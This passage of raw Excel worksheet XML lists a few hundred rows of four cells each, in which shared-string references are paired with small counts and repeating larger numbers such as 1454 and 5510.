      <c r="B18078" t="s">
        <v>16221</v>
      </c>
      <c r="C18078">
        <v>100</v>
      </c>
      <c r="D18078">
        <v>332</v>
      </c>
    </row>
    <row r="18079" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18079" t="s">
        <v>16230</v>
      </c>
      <c r="B18079" t="s">
        <v>16222</v>
      </c>
      <c r="C18079">
        <v>30</v>
      </c>
      <c r="D18079">
        <v>332</v>
      </c>
    </row>
    <row r="18080" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18080" t="s">
        <v>16223</v>
      </c>
      <c r="B18080" t="s">
        <v>16223</v>
      </c>
      <c r="C18080">
        <v>25</v>
      </c>
      <c r="D18080">
        <v>332</v>
      </c>
    </row>
    <row r="18081" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18081" t="s">
        <v>16228</v>
      </c>
      <c r="B18081" t="s">
        <v>16211</v>
      </c>
      <c r="C18081">
        <v>0</v>
      </c>
      <c r="D18081">
        <v>5262</v>
      </c>
    </row>
    <row r="18082" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18082" t="s">
        <v>16231</v>
      </c>
      <c r="B18082" t="s">
        <v>16212</v>
      </c>
      <c r="C18082">
        <v>0</v>
      </c>
      <c r="D18082">
        <v>5262</v>
      </c>
    </row>
    <row r="18083" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18083" t="s">
        <v>16228</v>
      </c>
      <c r="B18083" t="s">
        <v>16211</v>
      </c>
      <c r="C18083">
        <v>0</v>
      </c>
      <c r="D18083">
        <v>1454</v>
      </c>
    </row>
    <row r="18084" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18084" t="s">
        <v>16231</v>
      </c>
      <c r="B18084" t="s">
        <v>16212</v>
      </c>
      <c r="C18084">
        <v>0</v>
      </c>
      <c r="D18084">
        <v>1454</v>
      </c>
    </row>
    <row r="18085" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18085" t="s">
        <v>16228</v>
      </c>
      <c r="B18085" t="s">
        <v>16213</v>
      </c>
      <c r="C18085">
        <v>0</v>
      </c>
      <c r="D18085">
        <v>1454</v>
      </c>
    </row>
    <row r="18086" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18086" t="s">
        <v>16231</v>
      </c>
      <c r="B18086" t="s">
        <v>16214</v>
      </c>
      <c r="C18086">
        <v>0</v>
      </c>
      <c r="D18086">
        <v>1454</v>
      </c>
    </row>
    <row r="18087" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18087" t="s">
        <v>16228</v>
      </c>
      <c r="B18087" t="s">
        <v>16215</v>
      </c>
      <c r="C18087">
        <v>17</v>
      </c>
      <c r="D18087">
        <v>1454</v>
      </c>
    </row>
    <row r="18088" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18088" t="s">
        <v>16231</v>
      </c>
      <c r="B18088" t="s">
        <v>16216</v>
      </c>
      <c r="C18088">
        <v>2</v>
      </c>
      <c r="D18088">
        <v>1454</v>
      </c>
    </row>
    <row r="18089" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18089" t="s">
        <v>16228</v>
      </c>
      <c r="B18089" t="s">
        <v>16217</v>
      </c>
      <c r="C18089">
        <v>0</v>
      </c>
      <c r="D18089">
        <v>1454</v>
      </c>
    </row>
    <row r="18090" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18090" t="s">
        <v>16231</v>
      </c>
      <c r="B18090" t="s">
        <v>16218</v>
      </c>
      <c r="C18090">
        <v>0</v>
      </c>
      <c r="D18090">
        <v>1454</v>
      </c>
    </row>
    <row r="18091" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18091" t="s">
        <v>16229</v>
      </c>
      <c r="B18091" t="s">
        <v>16219</v>
      </c>
      <c r="C18091">
        <v>0</v>
      </c>
      <c r="D18091">
        <v>1454</v>
      </c>
    </row>
    <row r="18092" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18092" t="s">
        <v>16230</v>
      </c>
      <c r="B18092" t="s">
        <v>16220</v>
      </c>
      <c r="C18092">
        <v>0</v>
      </c>
      <c r="D18092">
        <v>1454</v>
      </c>
    </row>
    <row r="18093" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18093" t="s">
        <v>16229</v>
      </c>
      <c r="B18093" t="s">
        <v>16221</v>
      </c>
      <c r="C18093">
        <v>0</v>
      </c>
      <c r="D18093">
        <v>1454</v>
      </c>
    </row>
    <row r="18094" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18094" t="s">
        <v>16230</v>
      </c>
      <c r="B18094" t="s">
        <v>16222</v>
      </c>
      <c r="C18094">
        <v>0</v>
      </c>
      <c r="D18094">
        <v>1454</v>
      </c>
    </row>
    <row r="18095" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18095" t="s">
        <v>16223</v>
      </c>
      <c r="B18095" t="s">
        <v>16223</v>
      </c>
      <c r="C18095">
        <v>0</v>
      </c>
      <c r="D18095">
        <v>1454</v>
      </c>
    </row>
    <row r="18096" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18096" t="s">
        <v>16224</v>
      </c>
      <c r="B18096" t="s">
        <v>16224</v>
      </c>
      <c r="C18096">
        <v>0</v>
      </c>
      <c r="D18096">
        <v>1454</v>
      </c>
    </row>
    <row r="18097" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18097" t="s">
        <v>16228</v>
      </c>
      <c r="B18097" t="s">
        <v>16211</v>
      </c>
      <c r="C18097">
        <v>1</v>
      </c>
      <c r="D18097">
        <v>28</v>
      </c>
    </row>
    <row r="18098" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18098" t="s">
        <v>16231</v>
      </c>
      <c r="B18098" t="s">
        <v>16212</v>
      </c>
      <c r="C18098">
        <v>9</v>
      </c>
      <c r="D18098">
        <v>28</v>
      </c>
    </row>
    <row r="18099" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18099" t="s">
        <v>16228</v>
      </c>
      <c r="B18099" t="s">
        <v>16213</v>
      </c>
      <c r="C18099">
        <v>26</v>
      </c>
      <c r="D18099">
        <v>28</v>
      </c>
    </row>
    <row r="18100" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18100" t="s">
        <v>16231</v>
      </c>
      <c r="B18100" t="s">
        <v>16214</v>
      </c>
      <c r="C18100">
        <v>14</v>
      </c>
      <c r="D18100">
        <v>28</v>
      </c>
    </row>
    <row r="18101" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18101" t="s">
        <v>16228</v>
      </c>
      <c r="B18101" t="s">
        <v>16215</v>
      </c>
      <c r="C18101">
        <v>1</v>
      </c>
      <c r="D18101">
        <v>28</v>
      </c>
    </row>
    <row r="18102" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18102" t="s">
        <v>16231</v>
      </c>
      <c r="B18102" t="s">
        <v>16216</v>
      </c>
      <c r="C18102">
        <v>9</v>
      </c>
      <c r="D18102">
        <v>28</v>
      </c>
    </row>
    <row r="18103" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18103" t="s">
        <v>16228</v>
      </c>
      <c r="B18103" t="s">
        <v>16217</v>
      </c>
      <c r="C18103">
        <v>26</v>
      </c>
      <c r="D18103">
        <v>28</v>
      </c>
    </row>
    <row r="18104" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18104" t="s">
        <v>16231</v>
      </c>
      <c r="B18104" t="s">
        <v>16218</v>
      </c>
      <c r="C18104">
        <v>14</v>
      </c>
      <c r="D18104">
        <v>28</v>
      </c>
    </row>
    <row r="18105" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18105" t="s">
        <v>16229</v>
      </c>
      <c r="B18105" t="s">
        <v>16219</v>
      </c>
      <c r="C18105">
        <v>0</v>
      </c>
      <c r="D18105">
        <v>28</v>
      </c>
    </row>
    <row r="18106" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18106" t="s">
        <v>16230</v>
      </c>
      <c r="B18106" t="s">
        <v>16220</v>
      </c>
      <c r="C18106">
        <v>0</v>
      </c>
      <c r="D18106">
        <v>28</v>
      </c>
    </row>
    <row r="18107" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18107" t="s">
        <v>16229</v>
      </c>
      <c r="B18107" t="s">
        <v>16221</v>
      </c>
      <c r="C18107">
        <v>0</v>
      </c>
      <c r="D18107">
        <v>28</v>
      </c>
    </row>
    <row r="18108" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18108" t="s">
        <v>16230</v>
      </c>
      <c r="B18108" t="s">
        <v>16222</v>
      </c>
      <c r="C18108">
        <v>0</v>
      </c>
      <c r="D18108">
        <v>28</v>
      </c>
    </row>
    <row r="18109" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18109" t="s">
        <v>16223</v>
      </c>
      <c r="B18109" t="s">
        <v>16223</v>
      </c>
      <c r="C18109">
        <v>0</v>
      </c>
      <c r="D18109">
        <v>28</v>
      </c>
    </row>
    <row r="18110" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18110" t="s">
        <v>16224</v>
      </c>
      <c r="B18110" t="s">
        <v>16224</v>
      </c>
      <c r="C18110">
        <v>0</v>
      </c>
      <c r="D18110">
        <v>28</v>
      </c>
    </row>
    <row r="18111" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18111" t="s">
        <v>16223</v>
      </c>
      <c r="B18111" t="s">
        <v>16223</v>
      </c>
      <c r="C18111">
        <v>5</v>
      </c>
      <c r="D18111">
        <v>5284</v>
      </c>
    </row>
    <row r="18112" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18112" t="s">
        <v>16228</v>
      </c>
      <c r="B18112" t="s">
        <v>16211</v>
      </c>
      <c r="C18112">
        <v>0</v>
      </c>
      <c r="D18112">
        <v>1772</v>
      </c>
    </row>
    <row r="18113" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18113" t="s">
        <v>16231</v>
      </c>
      <c r="B18113" t="s">
        <v>16212</v>
      </c>
      <c r="C18113">
        <v>0</v>
      </c>
      <c r="D18113">
        <v>1772</v>
      </c>
    </row>
    <row r="18114" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18114" t="s">
        <v>16228</v>
      </c>
      <c r="B18114" t="s">
        <v>16213</v>
      </c>
      <c r="C18114">
        <v>0</v>
      </c>
      <c r="D18114">
        <v>1772</v>
      </c>
    </row>
    <row r="18115" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18115" t="s">
        <v>16231</v>
      </c>
      <c r="B18115" t="s">
        <v>16214</v>
      </c>
      <c r="C18115">
        <v>0</v>
      </c>
      <c r="D18115">
        <v>1772</v>
      </c>
    </row>
    <row r="18116" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18116" t="s">
        <v>16228</v>
      </c>
      <c r="B18116" t="s">
        <v>16215</v>
      </c>
      <c r="C18116">
        <v>1</v>
      </c>
      <c r="D18116">
        <v>1772</v>
      </c>
    </row>
    <row r="18117" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18117" t="s">
        <v>16231</v>
      </c>
      <c r="B18117" t="s">
        <v>16216</v>
      </c>
      <c r="C18117">
        <v>0</v>
      </c>
      <c r="D18117">
        <v>1772</v>
      </c>
    </row>
    <row r="18118" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18118" t="s">
        <v>16228</v>
      </c>
      <c r="B18118" t="s">
        <v>16217</v>
      </c>
      <c r="C18118">
        <v>0</v>
      </c>
      <c r="D18118">
        <v>1772</v>
      </c>
    </row>
    <row r="18119" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18119" t="s">
        <v>16231</v>
      </c>
      <c r="B18119" t="s">
        <v>16218</v>
      </c>
      <c r="C18119">
        <v>0</v>
      </c>
      <c r="D18119">
        <v>1772</v>
      </c>
    </row>
    <row r="18120" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18120" t="s">
        <v>16229</v>
      </c>
      <c r="B18120" t="s">
        <v>16219</v>
      </c>
      <c r="C18120">
        <v>0</v>
      </c>
      <c r="D18120">
        <v>1772</v>
      </c>
    </row>
    <row r="18121" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18121" t="s">
        <v>16230</v>
      </c>
      <c r="B18121" t="s">
        <v>16220</v>
      </c>
      <c r="C18121">
        <v>1</v>
      </c>
      <c r="D18121">
        <v>1772</v>
      </c>
    </row>
    <row r="18122" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18122" t="s">
        <v>16229</v>
      </c>
      <c r="B18122" t="s">
        <v>16221</v>
      </c>
      <c r="C18122">
        <v>6</v>
      </c>
      <c r="D18122">
        <v>1772</v>
      </c>
    </row>
    <row r="18123" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18123" t="s">
        <v>16230</v>
      </c>
      <c r="B18123" t="s">
        <v>16222</v>
      </c>
      <c r="C18123">
        <v>0</v>
      </c>
      <c r="D18123">
        <v>1772</v>
      </c>
    </row>
    <row r="18124" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18124" t="s">
        <v>16223</v>
      </c>
      <c r="B18124" t="s">
        <v>16223</v>
      </c>
      <c r="C18124">
        <v>6</v>
      </c>
      <c r="D18124">
        <v>1772</v>
      </c>
    </row>
    <row r="18125" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18125" t="s">
        <v>16224</v>
      </c>
      <c r="B18125" t="s">
        <v>16224</v>
      </c>
      <c r="C18125">
        <v>1</v>
      </c>
      <c r="D18125">
        <v>1772</v>
      </c>
    </row>
    <row r="18126" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18126" t="s">
        <v>16228</v>
      </c>
      <c r="B18126" t="s">
        <v>16211</v>
      </c>
      <c r="C18126">
        <v>0</v>
      </c>
      <c r="D18126">
        <v>1634</v>
      </c>
    </row>
    <row r="18127" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18127" t="s">
        <v>16231</v>
      </c>
      <c r="B18127" t="s">
        <v>16212</v>
      </c>
      <c r="C18127">
        <v>0</v>
      </c>
      <c r="D18127">
        <v>1634</v>
      </c>
    </row>
    <row r="18128" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18128" t="s">
        <v>16228</v>
      </c>
      <c r="B18128" t="s">
        <v>16213</v>
      </c>
      <c r="C18128">
        <v>0</v>
      </c>
      <c r="D18128">
        <v>1634</v>
      </c>
    </row>
    <row r="18129" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18129" t="s">
        <v>16231</v>
      </c>
      <c r="B18129" t="s">
        <v>16214</v>
      </c>
      <c r="C18129">
        <v>0</v>
      </c>
      <c r="D18129">
        <v>1634</v>
      </c>
    </row>
    <row r="18130" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18130" t="s">
        <v>16228</v>
      </c>
      <c r="B18130" t="s">
        <v>16215</v>
      </c>
      <c r="C18130">
        <v>2</v>
      </c>
      <c r="D18130">
        <v>1634</v>
      </c>
    </row>
    <row r="18131" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18131" t="s">
        <v>16231</v>
      </c>
      <c r="B18131" t="s">
        <v>16216</v>
      </c>
      <c r="C18131">
        <v>1</v>
      </c>
      <c r="D18131">
        <v>1634</v>
      </c>
    </row>
    <row r="18132" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18132" t="s">
        <v>16228</v>
      </c>
      <c r="B18132" t="s">
        <v>16217</v>
      </c>
      <c r="C18132">
        <v>0</v>
      </c>
      <c r="D18132">
        <v>1634</v>
      </c>
    </row>
    <row r="18133" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18133" t="s">
        <v>16231</v>
      </c>
      <c r="B18133" t="s">
        <v>16218</v>
      </c>
      <c r="C18133">
        <v>0</v>
      </c>
      <c r="D18133">
        <v>1634</v>
      </c>
    </row>
    <row r="18134" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18134" t="s">
        <v>16229</v>
      </c>
      <c r="B18134" t="s">
        <v>16219</v>
      </c>
      <c r="C18134">
        <v>0</v>
      </c>
      <c r="D18134">
        <v>1634</v>
      </c>
    </row>
    <row r="18135" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18135" t="s">
        <v>16230</v>
      </c>
      <c r="B18135" t="s">
        <v>16220</v>
      </c>
      <c r="C18135">
        <v>0</v>
      </c>
      <c r="D18135">
        <v>1634</v>
      </c>
    </row>
    <row r="18136" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18136" t="s">
        <v>16229</v>
      </c>
      <c r="B18136" t="s">
        <v>16221</v>
      </c>
      <c r="C18136">
        <v>2</v>
      </c>
      <c r="D18136">
        <v>1634</v>
      </c>
    </row>
    <row r="18137" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18137" t="s">
        <v>16230</v>
      </c>
      <c r="B18137" t="s">
        <v>16222</v>
      </c>
      <c r="C18137">
        <v>5</v>
      </c>
      <c r="D18137">
        <v>1634</v>
      </c>
    </row>
    <row r="18138" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18138" t="s">
        <v>16223</v>
      </c>
      <c r="B18138" t="s">
        <v>16223</v>
      </c>
      <c r="C18138">
        <v>0</v>
      </c>
      <c r="D18138">
        <v>1634</v>
      </c>
    </row>
    <row r="18139" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18139" t="s">
        <v>16224</v>
      </c>
      <c r="B18139" t="s">
        <v>16224</v>
      </c>
      <c r="C18139">
        <v>0</v>
      </c>
      <c r="D18139">
        <v>1634</v>
      </c>
    </row>
    <row r="18140" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18140" t="s">
        <v>16228</v>
      </c>
      <c r="B18140" t="s">
        <v>16211</v>
      </c>
      <c r="C18140">
        <v>1</v>
      </c>
      <c r="D18140">
        <v>1559</v>
      </c>
    </row>
    <row r="18141" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18141" t="s">
        <v>16231</v>
      </c>
      <c r="B18141" t="s">
        <v>16212</v>
      </c>
      <c r="C18141">
        <v>0</v>
      </c>
      <c r="D18141">
        <v>1559</v>
      </c>
    </row>
    <row r="18142" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18142" t="s">
        <v>16228</v>
      </c>
      <c r="B18142" t="s">
        <v>16213</v>
      </c>
      <c r="C18142">
        <v>5</v>
      </c>
      <c r="D18142">
        <v>1559</v>
      </c>
    </row>
    <row r="18143" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18143" t="s">
        <v>16231</v>
      </c>
      <c r="B18143" t="s">
        <v>16214</v>
      </c>
      <c r="C18143">
        <v>10</v>
      </c>
      <c r="D18143">
        <v>1559</v>
      </c>
    </row>
    <row r="18144" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18144" t="s">
        <v>16228</v>
      </c>
      <c r="B18144" t="s">
        <v>16215</v>
      </c>
      <c r="C18144">
        <v>1</v>
      </c>
      <c r="D18144">
        <v>1559</v>
      </c>
    </row>
    <row r="18145" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18145" t="s">
        <v>16231</v>
      </c>
      <c r="B18145" t="s">
        <v>16216</v>
      </c>
      <c r="C18145">
        <v>0</v>
      </c>
      <c r="D18145">
        <v>1559</v>
      </c>
    </row>
    <row r="18146" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18146" t="s">
        <v>16228</v>
      </c>
      <c r="B18146" t="s">
        <v>16217</v>
      </c>
      <c r="C18146">
        <v>0</v>
      </c>
      <c r="D18146">
        <v>1559</v>
      </c>
    </row>
    <row r="18147" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18147" t="s">
        <v>16231</v>
      </c>
      <c r="B18147" t="s">
        <v>16218</v>
      </c>
      <c r="C18147">
        <v>0</v>
      </c>
      <c r="D18147">
        <v>1559</v>
      </c>
    </row>
    <row r="18148" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18148" t="s">
        <v>16229</v>
      </c>
      <c r="B18148" t="s">
        <v>16219</v>
      </c>
      <c r="C18148">
        <v>0</v>
      </c>
      <c r="D18148">
        <v>1559</v>
      </c>
    </row>
    <row r="18149" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18149" t="s">
        <v>16230</v>
      </c>
      <c r="B18149" t="s">
        <v>16220</v>
      </c>
      <c r="C18149">
        <v>0</v>
      </c>
      <c r="D18149">
        <v>1559</v>
      </c>
    </row>
    <row r="18150" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18150" t="s">
        <v>16229</v>
      </c>
      <c r="B18150" t="s">
        <v>16221</v>
      </c>
      <c r="C18150">
        <v>5</v>
      </c>
      <c r="D18150">
        <v>1559</v>
      </c>
    </row>
    <row r="18151" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18151" t="s">
        <v>16230</v>
      </c>
      <c r="B18151" t="s">
        <v>16222</v>
      </c>
      <c r="C18151">
        <v>10</v>
      </c>
      <c r="D18151">
        <v>1559</v>
      </c>
    </row>
    <row r="18152" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18152" t="s">
        <v>16223</v>
      </c>
      <c r="B18152" t="s">
        <v>16223</v>
      </c>
      <c r="C18152">
        <v>20</v>
      </c>
      <c r="D18152">
        <v>1559</v>
      </c>
    </row>
    <row r="18153" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18153" t="s">
        <v>16224</v>
      </c>
      <c r="B18153" t="s">
        <v>16224</v>
      </c>
      <c r="C18153">
        <v>0</v>
      </c>
      <c r="D18153">
        <v>1559</v>
      </c>
    </row>
    <row r="18154" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18154" t="s">
        <v>16228</v>
      </c>
      <c r="B18154" t="s">
        <v>16211</v>
      </c>
      <c r="C18154">
        <v>0</v>
      </c>
      <c r="D18154">
        <v>411</v>
      </c>
    </row>
    <row r="18155" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18155" t="s">
        <v>16231</v>
      </c>
      <c r="B18155" t="s">
        <v>16212</v>
      </c>
      <c r="C18155">
        <v>0</v>
      </c>
      <c r="D18155">
        <v>411</v>
      </c>
    </row>
    <row r="18156" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18156" t="s">
        <v>16228</v>
      </c>
      <c r="B18156" t="s">
        <v>16213</v>
      </c>
      <c r="C18156">
        <v>0</v>
      </c>
      <c r="D18156">
        <v>411</v>
      </c>
    </row>
    <row r="18157" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18157" t="s">
        <v>16231</v>
      </c>
      <c r="B18157" t="s">
        <v>16214</v>
      </c>
      <c r="C18157">
        <v>0</v>
      </c>
      <c r="D18157">
        <v>411</v>
      </c>
    </row>
    <row r="18158" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18158" t="s">
        <v>16228</v>
      </c>
      <c r="B18158" t="s">
        <v>16215</v>
      </c>
      <c r="C18158">
        <v>4</v>
      </c>
      <c r="D18158">
        <v>411</v>
      </c>
    </row>
    <row r="18159" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18159" t="s">
        <v>16231</v>
      </c>
      <c r="B18159" t="s">
        <v>16216</v>
      </c>
      <c r="C18159">
        <v>3</v>
      </c>
      <c r="D18159">
        <v>411</v>
      </c>
    </row>
    <row r="18160" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18160" t="s">
        <v>16228</v>
      </c>
      <c r="B18160" t="s">
        <v>16217</v>
      </c>
      <c r="C18160">
        <v>10</v>
      </c>
      <c r="D18160">
        <v>411</v>
      </c>
    </row>
    <row r="18161" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18161" t="s">
        <v>16231</v>
      </c>
      <c r="B18161" t="s">
        <v>16218</v>
      </c>
      <c r="C18161">
        <v>3</v>
      </c>
      <c r="D18161">
        <v>411</v>
      </c>
    </row>
    <row r="18162" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18162" t="s">
        <v>16229</v>
      </c>
      <c r="B18162" t="s">
        <v>16219</v>
      </c>
      <c r="C18162">
        <v>2</v>
      </c>
      <c r="D18162">
        <v>411</v>
      </c>
    </row>
    <row r="18163" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18163" t="s">
        <v>16230</v>
      </c>
      <c r="B18163" t="s">
        <v>16220</v>
      </c>
      <c r="C18163">
        <v>4</v>
      </c>
      <c r="D18163">
        <v>411</v>
      </c>
    </row>
    <row r="18164" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18164" t="s">
        <v>16229</v>
      </c>
      <c r="B18164" t="s">
        <v>16221</v>
      </c>
      <c r="C18164">
        <v>20</v>
      </c>
      <c r="D18164">
        <v>411</v>
      </c>
    </row>
    <row r="18165" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18165" t="s">
        <v>16230</v>
      </c>
      <c r="B18165" t="s">
        <v>16222</v>
      </c>
      <c r="C18165">
        <v>2</v>
      </c>
      <c r="D18165">
        <v>411</v>
      </c>
    </row>
    <row r="18166" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18166" t="s">
        <v>16223</v>
      </c>
      <c r="B18166" t="s">
        <v>16223</v>
      </c>
      <c r="C18166">
        <v>25</v>
      </c>
      <c r="D18166">
        <v>411</v>
      </c>
    </row>
    <row r="18167" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18167" t="s">
        <v>16224</v>
      </c>
      <c r="B18167" t="s">
        <v>16224</v>
      </c>
      <c r="C18167">
        <v>1</v>
      </c>
      <c r="D18167">
        <v>411</v>
      </c>
    </row>
    <row r="18168" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18168" t="s">
        <v>16228</v>
      </c>
      <c r="B18168" t="s">
        <v>16211</v>
      </c>
      <c r="C18168">
        <v>0</v>
      </c>
      <c r="D18168">
        <v>5510</v>
      </c>
    </row>
    <row r="18169" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18169" t="s">
        <v>16231</v>
      </c>
      <c r="B18169" t="s">
        <v>16212</v>
      </c>
      <c r="C18169">
        <v>0</v>
      </c>
      <c r="D18169">
        <v>5510</v>
      </c>
    </row>
    <row r="18170" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18170" t="s">
        <v>16228</v>
      </c>
      <c r="B18170" t="s">
        <v>16213</v>
      </c>
      <c r="C18170">
        <v>0</v>
      </c>
      <c r="D18170">
        <v>5510</v>
      </c>
    </row>
    <row r="18171" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18171" t="s">
        <v>16231</v>
      </c>
      <c r="B18171" t="s">
        <v>16214</v>
      </c>
      <c r="C18171">
        <v>0</v>
      </c>
      <c r="D18171">
        <v>5510</v>
      </c>
    </row>
    <row r="18172" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18172" t="s">
        <v>16228</v>
      </c>
      <c r="B18172" t="s">
        <v>16215</v>
      </c>
      <c r="C18172">
        <v>0</v>
      </c>
      <c r="D18172">
        <v>5510</v>
      </c>
    </row>
    <row r="18173" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18173" t="s">
        <v>16231</v>
      </c>
      <c r="B18173" t="s">
        <v>16216</v>
      </c>
      <c r="C18173">
        <v>1</v>
      </c>
      <c r="D18173">
        <v>5510</v>
      </c>
    </row>
    <row r="18174" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18174" t="s">
        <v>16228</v>
      </c>
      <c r="B18174" t="s">
        <v>16217</v>
      </c>
      <c r="C18174">
        <v>8</v>
      </c>
      <c r="D18174">
        <v>5510</v>
      </c>
    </row>
    <row r="18175" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18175" t="s">
        <v>16231</v>
      </c>
      <c r="B18175" t="s">
        <v>16218</v>
      </c>
      <c r="C18175">
        <v>2</v>
      </c>
      <c r="D18175">
        <v>5510</v>
      </c>
    </row>
    <row r="18176" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18176" t="s">
        <v>16229</v>
      </c>
      <c r="B18176" t="s">
        <v>16219</v>
      </c>
      <c r="C18176">
        <v>0</v>
      </c>
      <c r="D18176">
        <v>5510</v>
      </c>
    </row>
    <row r="18177" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18177" t="s">
        <v>16230</v>
      </c>
      <c r="B18177" t="s">
        <v>16220</v>
      </c>
      <c r="C18177">
        <v>0</v>
      </c>
      <c r="D18177">
        <v>5510</v>
      </c>
    </row>
    <row r="18178" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18178" t="s">
        <v>16229</v>
      </c>
      <c r="B18178" t="s">
        <v>16221</v>
      </c>
      <c r="C18178">
        <v>30</v>
      </c>
      <c r="D18178">
        <v>5510</v>
      </c>
    </row>
    <row r="18179" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18179" t="s">
        <v>16230</v>
      </c>
      <c r="B18179" t="s">
        <v>16222</v>
      </c>
      <c r="C18179">
        <v>20</v>
      </c>
      <c r="D18179">
        <v>5510</v>
      </c>
    </row>
    <row r="18180" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18180" t="s">
        <v>16223</v>
      </c>
      <c r="B18180" t="s">
        <v>16223</v>
      </c>
      <c r="C18180">
        <v>25</v>
      </c>
      <c r="D18180">
        <v>5510</v>
      </c>
    </row>
    <row r="18181" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18181" t="s">
        <v>16224</v>
      </c>
      <c r="B18181" t="s">
        <v>16224</v>
      </c>
      <c r="C18181">
        <v>1</v>
      </c>
      <c r="D18181">
        <v>5510</v>
      </c>
    </row>
    <row r="18182" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18182" t="s">
        <v>16228</v>
      </c>
      <c r="B18182" t="s">
        <v>16211</v>
      </c>
      <c r="C18182">
        <v>0</v>
      </c>
      <c r="D18182">
        <v>5504</v>
      </c>
    </row>
    <row r="18183" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18183" t="s">
        <v>16231</v>
      </c>
      <c r="B18183" t="s">
